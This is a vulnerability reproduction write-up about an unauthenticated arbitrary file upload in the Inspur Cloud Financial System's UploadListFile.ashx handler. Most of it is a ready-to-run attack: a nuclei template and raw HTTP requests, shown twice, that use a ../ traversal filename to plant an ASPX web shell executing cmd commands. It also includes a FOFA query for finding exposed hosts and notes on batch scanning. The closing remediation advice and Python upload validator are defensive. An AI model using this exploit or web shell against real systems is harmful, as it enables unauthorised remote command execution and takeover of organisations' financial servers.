Vulnerability description:
The UploadListFile.ashx handler of the Inspur Cloud Financial System (浪潮云财务系统) has an arbitrary file upload vulnerability. The handler saves the upload under the client-supplied filename without normalising the path or checking the extension, so a directory-traversal filename such as ../../../../../../rce.aspx lands an ASPX page in the /cwbase/ web root, where IIS executes it. The PoC request carries no session cookie, so the upload appears to need no authentication. An attacker who drops a web shell this way runs commands as the IIS worker process and can take over the host.
01—Nuclei POC

The template below is the write-up's template with the YAML indentation restored, the blank lines that separate HTTP headers from the multipart body put back, the mangled Accept header repaired, and req-condition: true added (nuclei only exposes status_code_1 / status_code_2 to a DSL matcher when that flag is set). Matching on two 200 responses alone is a weak signal: a catch-all page or an error handler that answers 200 for unknown paths will pass it. Tightening the second matcher to check for the whoami output (for example contains(body_2, "\\")) is advisable when scanning at scale. Note also that the shell deletes itself after one request (System.IO.File.Delete(Request.PhysicalPath)), so the template is single-shot per upload.

id: langchaoyun-UploadListFile-UploadFile

info:
  name: Inspur Cloud Financial System (浪潮云财务系统) UploadListFile arbitrary file upload
  author: kingkong
  severity: high
  metadata:
    fofa-query: body="/cwbase/web/scripts/jquery.js" || icon_hash="-1341069524"

http:
  - raw:
      - |
        POST /cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
        Accept: */*
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Connection: close
        Content-Type: multipart/form-data; boundary=---------------------------rww5upkbw6ctf0tu5hye

        -----------------------------rww5upkbw6ctf0tu5hye
        Content-Disposition: form-data; name="file"; filename="../../../../../../rce.aspx"
        Content-Type: image/png

        <%@ Page Language="Jscript" validateRequest="false" %>
        <%
        var c=new System.Diagnostics.ProcessStartInfo("cmd");
        var e=new System.Diagnostics.Process();
        var out:System.IO.StreamReader,EI:System.IO.StreamReader;
        c.UseShellExecute=false;
        c.RedirectStandardOutput=true;
        c.RedirectStandardError=true;
        e.StartInfo=c;
        c.Arguments="/c " + Request.Item["cmd"];
        e.Start();
        out=e.StandardOutput;
        EI=e.StandardError;
        e.Close();
        Response.Write(out.ReadToEnd() + EI.ReadToEnd());
        System.IO.File.Delete(Request.PhysicalPath);
        Response.End();%>
        -----------------------------rww5upkbw6ctf0tu5hye--

      - |
        GET /cwbase/rce.aspx?cmd=whoami HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'status_code_2 == 200'
        condition: and
02—Search syntax
FOFA: body="/cwbase/web/scripts/jquery.js" || icon_hash="-1341069524"
[Screenshot: FOFA search results page]
03—Vulnerability reproduction

Send the upload request first, then request /cwbase/rce.aspx?cmd=whoami. The six ../ segments walk from the attachment directory up to the /cwbase/ web root, which is why the shell is fetched from /cwbase/ and not from the upload path. Because the shell removes itself after serving one request, each further command needs a fresh upload; a 404 on a second GET after a successful first one is expected and does not mean the upload failed.

[Screenshot: accessing the uploaded path and executing a command]

Detection PoC

POST /cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=1 HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------rww5upkbw6ctf0tu5hye

-----------------------------rww5upkbw6ctf0tu5hye
Content-Disposition: form-data; name="file"; filename="../../../../../../rce.aspx"
Content-Type: image/png

<%@ Page Language="Jscript" validateRequest="false" %>
<%
var c=new System.Diagnostics.ProcessStartInfo("cmd");
var e=new System.Diagnostics.Process();
var out:System.IO.StreamReader,EI:System.IO.StreamReader;
c.UseShellExecute=false;
c.RedirectStandardOutput=true;
c.RedirectStandardError=true;
e.StartInfo=c;
c.Arguments="/c " + Request.Item["cmd"];
e.Start();
out=e.StandardOutput;
EI=e.StandardError;
e.Close();
Response.Write(out.ReadToEnd() + EI.ReadToEnd());
System.IO.File.Delete(Request.PhysicalPath);
Response.End();%>
-----------------------------rww5upkbw6ctf0tu5hye--

GET /cwbase/rce.aspx?cmd=whoami HTTP/1.1
Host: <target>

[Screenshot: nuclei batch detection results]
04—Remediation
1. File type validation: allow only the file types the feature needs (images, documents) by a server-side extension allow-list and by inspecting the file content, and reject executable and script types (.aspx, .ashx, .asp, .asmx, .php, .jsp and similar). Do not trust the client-supplied Content-Type header: the PoC declares image/png while uploading an ASPX page.
2. File size limit: cap the size of uploads so that a malicious user cannot exhaust disk or memory with oversized files.
3. Filename handling: rename every upload to a server-generated name and never reuse the user-supplied filename, which is how the path traversal in ../../../../../../rce.aspx reaches the web root. Store uploads outside the web root, or in a directory where IIS has script execution disabled, so that even a file that slips past the allow-list cannot run.
4. Access control: require an authenticated session on the UploadListFile.ashx handler; the PoC request carries no cookie or token.
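The checks from points 1 to 3 in one server-side validator, as an added Python example (not the vendor's code; the product is ASP.NET, so this shows the checks rather than an actual patch). Assumptions not on the page: UPLOAD_ROOT is a directory outside the web root with script execution disabled, and the allow-list of extensions with their leading magic bytes is an illustrative set. The PoC's own filename and shell body are used as the rejected inputs.

```python
"""Server-side upload validation: allow-list, content sniffing, size cap, server-chosen name (added example)."""
import os
import secrets
from pathlib import Path

UPLOAD_ROOT = Path("/srv/app/uploads")   # assumption: outside the web root, script execution disabled
MAX_BYTES = 10 * 1024 * 1024

# Allowed extensions and the bytes a file of that type must actually start with.
# The client's Content-Type header is ignored entirely: the PoC sends image/png with an .aspx body.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".pdf": (b"%PDF-",),
}


class UploadRejected(ValueError):
    pass


def validate_upload(client_filename, data):
    """Return the server-chosen destination path, or raise UploadRejected.

    The client-supplied name is used for nothing but its extension: directory parts
    (../ or ..\\) are discarded, so ../../../../../../rce.aspx can never leave UPLOAD_ROOT,
    and the stored name is random, so the uploader can neither choose nor predict it.
    """
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    # Strip any directory component, from either path separator (IIS accepts both).
    base = os.path.basename(client_filename.replace("\\", "/"))
    ext = Path(base).suffix.lower()            # "" for names such as "shell.aspx." or "shell"
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext or '(none)'} not allowed")
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise UploadRejected(f"content does not look like {ext}")
    dest = (UPLOAD_ROOT / f"{secrets.token_hex(16)}{ext}").resolve()
    # Belt and braces: the resolved path must still sit directly under UPLOAD_ROOT.
    if dest.parent != UPLOAD_ROOT.resolve():
        raise UploadRejected("destination escaped the upload root")
    return dest


def is_rejected(client_filename, data):
    """True if validate_upload refuses the input; handy for tests and audit logging."""
    try:
        validate_upload(client_filename, data)
        return False
    except UploadRejected:
        return True
```

The magic-byte check stops the PoC (an ASPX body declared as image/png) but not a polyglot that starts with a valid PNG header and carries script after it; that case is covered by the storage location, not by the validator, which is why the non-executable directory outside the web root is the control that matters most.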
05—Download address
Originally published on the WeChat official account 脚本小子: 浪潮云财务系统UploadListFile接口处存在任意文件上传漏洞【漏洞复现|附nuclei-POC】 (Inspur Cloud Financial System UploadListFile interface arbitrary file upload vulnerability [reproduction | with nuclei POC])